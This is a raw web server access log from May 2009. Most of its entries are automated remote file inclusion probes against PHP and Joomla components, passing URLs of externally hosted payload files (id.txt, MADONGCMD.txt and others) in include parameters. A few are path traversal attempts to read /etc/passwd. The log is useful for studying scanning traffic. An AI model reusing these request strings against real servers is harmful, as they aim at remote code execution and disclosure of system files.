88.191.103.144 - - [12/May/2009:19:01:20 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:19:01:20 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.825"
218.185.20.88 - - [12/May/2009:19:01:54 -0500] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:01:54 -0500] "GET /logs/access_log.1239062400//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:01:54 -0500] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:02:06 -0500] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:02:06 -0500] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:02:06 -0500] "GET /logs/access_log.1239062400//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:02:09 -0500] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:02:09 -0500] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:02:09 -0500] "GET /logs/access_log.1239062400//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:02:55 -0500] "GET /logs/access_log.1238112000//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:03:18 -0500] "GET /logs/access_log.1238112000//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:03:20 -0500] "GET /logs/access_log.1238112000//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
203.22.204.193 - - [12/May/2009:19:03:32 -0500] "GET /logs/show.php?path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.76"
203.22.204.193 - - [12/May/2009:19:03:33 -0500] "GET /show.php?path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.76"
203.22.204.193 - - [12/May/2009:19:03:34 -0500] "GET /logs/show.php?path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.76"
203.22.204.193 - - [12/May/2009:19:03:35 -0500] "GET /show.php?path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.76"
69.172.126.16 - - [12/May/2009:19:04:02 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:19:04:02 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
66.11.230.61 - - [12/May/2009:19:05:31 -0500] "GET /logs/access_log.1240185600/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.11.230.61 - - [12/May/2009:19:05:31 -0500] "GET /errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.11.230.61 - - [12/May/2009:19:05:31 -0500] "GET /logs/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
196.40.83.75 - - [12/May/2009:19:07:30 -0500] "GET /logs/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
196.40.83.75 - - [12/May/2009:19:07:30 -0500] "GET /logs/access_log.1240185600/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
196.40.83.75 - - [12/May/2009:19:07:30 -0500] "GET /errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
88.191.103.144 - - [12/May/2009:19:08:13 -0500] "GET /errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
88.191.103.144 - - [12/May/2009:19:08:13 -0500] "GET /logs/access_log.1240185600/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
88.191.103.144 - - [12/May/2009:19:08:13 -0500] "GET /logs/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
88.191.103.144 - - [12/May/2009:19:08:27 -0500] "GET /logs/access_log.1240617600/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.93.90.162 - - [12/May/2009:19:09:42 -0500] "GET /logs/access_log.1240185600/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.93.90.162 - - [12/May/2009:19:09:42 -0500] "GET /errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
69.93.90.162 - - [12/May/2009:19:09:44 -0500] "GET /logs/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.72.235 - - [12/May/2009:19:10:17 -0500] "GET /logs/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.214.72.235 - - [12/May/2009:19:10:17 -0500] "GET /logs/access_log.1240185600/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.72.235 - - [12/May/2009:19:10:17 -0500] "GET /errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.72.235 - - [12/May/2009:19:10:36 -0500] "GET /logs/access_log.1240617600/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
196.40.83.75 - - [12/May/2009:19:15:39 -0500] "GET /logs/access_log.1240617600/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.11.230.61 - - [12/May/2009:19:16:21 -0500] "GET /logs/access_log.1240617600/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.5.250.95 - - [12/May/2009:19:17:22 -0500] "GET ////png.php?include_path=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
72.5.250.95 - - [12/May/2009:19:17:22 -0500] "GET /logs////png.php?include_path=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
69.93.90.162 - - [12/May/2009:19:22:17 -0500] "GET /logs/access_log.1240617600/errors.php?error=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
221.139.1.251 - - [12/May/2009:19:26:46 -0500] "GET /logs/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
221.139.1.251 - - [12/May/2009:19:26:46 -0500] "GET /errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
221.139.1.251 - - [12/May/2009:19:26:46 -0500] "GET /logs/access_log.1240185600/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
77.221.130.19 - - [12/May/2009:19:27:17 -0500] "GET /logs/modifyform.html?code=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
77.221.130.19 - - [12/May/2009:19:27:17 -0500] "GET /logs/modifyform.html?code=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
77.221.130.19 - - [12/May/2009:19:27:18 -0500] "GET /modifyform.html?code=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.19 - - [12/May/2009:19:27:18 -0500] "GET /modifyform.html?code=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
221.139.1.251 - - [12/May/2009:19:27:19 -0500] "GET /logs/access_log.1240617600/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.124 - - [12/May/2009:19:28:05 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.103.144 - - [12/May/2009:19:28:57 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 329 "-""libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:19:28:57 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.825"
65.55.106.124 - - [12/May/2009:19:29:07 -0500] "GET /logs/access_log.1182038400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.93.90.162 - - [12/May/2009:19:30:55 -0500] "GET /logs//com_rwcards/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
69.93.90.162 - - [12/May/2009:19:30:55 -0500] "GET //com_rwcards/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
69.93.90.162 - - [12/May/2009:19:30:57 -0500] "GET /logs//com_rwcards/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
69.93.90.162 - - [12/May/2009:19:30:57 -0500] "GET //com_rwcards/errors.php?error=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
77.221.130.19 - - [12/May/2009:19:36:53 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
77.221.130.19 - - [12/May/2009:19:36:53 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
77.221.130.19 - - [12/May/2009:19:36:54 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
77.221.130.19 - - [12/May/2009:19:36:54 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
203.22.204.193 - - [12/May/2009:19:36:59 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.76"
203.22.204.193 - - [12/May/2009:19:36:59 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.76"
203.22.204.193 - - [12/May/2009:19:37:17 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.76"
203.22.204.193 - - [12/May/2009:19:37:17 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.76"
72.5.250.95 - - [12/May/2009:19:37:23 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
72.5.250.95 - - [12/May/2009:19:37:23 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.oby.ch/images/newscan1id.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
69.162.71.138 - - [12/May/2009:19:37:24 -0500] "GET /logs/access_log.1225238400http://www.amd2009.xpg.com.br/testarx.php? HTTP/1.1" 404 350 "-""Mozilla/3.0 (compatible; Indy Library)"
69.162.71.138 - - [12/May/2009:19:37:24 -0500] "GET /logs/access_log.1229126400http://www.amd2009.xpg.com.br/testarx.php? HTTP/1.1" 404 350 "-""Mozilla/3.0 (compatible; Indy Library)"
69.162.71.138 - - [12/May/2009:19:37:28 -0500] "GET /logs/access_log.1239580800http://www.amd2009.xpg.com.br/testarx.php? HTTP/1.1" 404 350 "-""Mozilla/3.0 (compatible; Indy Library)"
69.162.71.138 - - [12/May/2009:19:37:29 -0500] "GET /logs/access_log.1236729600http://www.amd2009.xpg.com.br/testarx.php? HTTP/1.1" 404 350 "-""Mozilla/3.0 (compatible; Indy Library)"
200.32.100.130 - - [12/May/2009:19:39:03 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.32.100.130 - - [12/May/2009:19:39:03 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.32.100.130 - - [12/May/2009:19:39:03 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
88.191.103.144 - - [12/May/2009:19:39:57 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:19:39:57 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.825"
65.55.208.139 - - [12/May/2009:19:40:54 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [12/May/2009:19:40:54 -0500] "GET /logs/access_log.1124582400 HTTP/1.1" 200 171 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
203.22.204.193 - - [12/May/2009:19:41:30 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.76"
203.22.204.193 - - [12/May/2009:19:41:30 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.76"
203.22.204.193 - - [12/May/2009:19:41:42 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.76"
203.22.204.193 - - [12/May/2009:19:41:42 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.76"
69.172.126.16 - - [12/May/2009:19:41:49 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:19:41:49 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
69.94.56.98 - - [12/May/2009:19:44:59 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 335 "-""libwww-perl/5.48"
69.94.56.98 - - [12/May/2009:19:44:59 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 330 "-""libwww-perl/5.48"
110.45.146.146 - - [12/May/2009:19:47:15 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
110.45.146.146 - - [12/May/2009:19:47:15 -0500] "GET /logs/access_log.1239926400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
110.45.146.146 - - [12/May/2009:19:47:15 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
110.45.144.164 - - [12/May/2009:19:49:05 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
110.45.144.164 - - [12/May/2009:19:49:05 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
110.45.144.164 - - [12/May/2009:19:49:05 -0500] "GET /logs/access_log.1239926400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 377 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:19:50:26 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:19:50:26 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:19:50:26 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:19:51:18 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:19:51:18 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:19:51:18 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
208.112.87.9 - - [12/May/2009:19:51:33 -0500] "GET /logs/?absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 189190 "-""libwww-perl/5.803"
208.112.87.9 - - [12/May/2009:19:51:33 -0500] "GET /?absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
200.32.100.130 - - [12/May/2009:19:52:46 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.32.100.130 - - [12/May/2009:19:52:46 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
200.32.100.130 - - [12/May/2009:19:52:46 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.32.100.130 - - [12/May/2009:19:52:49 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
200.32.100.130 - - [12/May/2009:19:52:49 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
200.32.100.130 - - [12/May/2009:19:52:49 -0500] "GET /logs/access_log.1239408000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.32.100.130 - - [12/May/2009:19:52:49 -0500] "GET /logs/access_log.1239580800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.32.100.130 - - [12/May/2009:19:52:50 -0500] "GET /logs/access_log.1239148800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:19:53:55 -0500] "GET /logs/access_log.1239062400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:19:53:56 -0500] "GET /logs/access_log.1239062400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:55:12 -0500] "GET //config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:55:12 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:55:12 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:56:03 -0500] "GET //config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:56:03 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:56:03 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
200.32.100.130 - - [12/May/2009:19:58:08 -0500] "GET /logs/access_log.1239494400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.32.100.130 - - [12/May/2009:19:58:11 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:58:51 -0500] "GET //config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:58:51 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:58:51 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:59:38 -0500] "GET //config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:59:38 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:19:59:38 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
200.32.100.130 - - [12/May/2009:20:01:02 -0500] "GET /logs/access_log.1239321600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
200.32.100.130 - - [12/May/2009:20:01:02 -0500] "GET /logs/access_log.1239494400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:01:21 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:01:26 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
122.153.212.195 - - [12/May/2009:20:01:36 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
208.64.202.135 - - [12/May/2009:20:01:58 -0500] "GET //config/dbutil.bck.php?confdir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
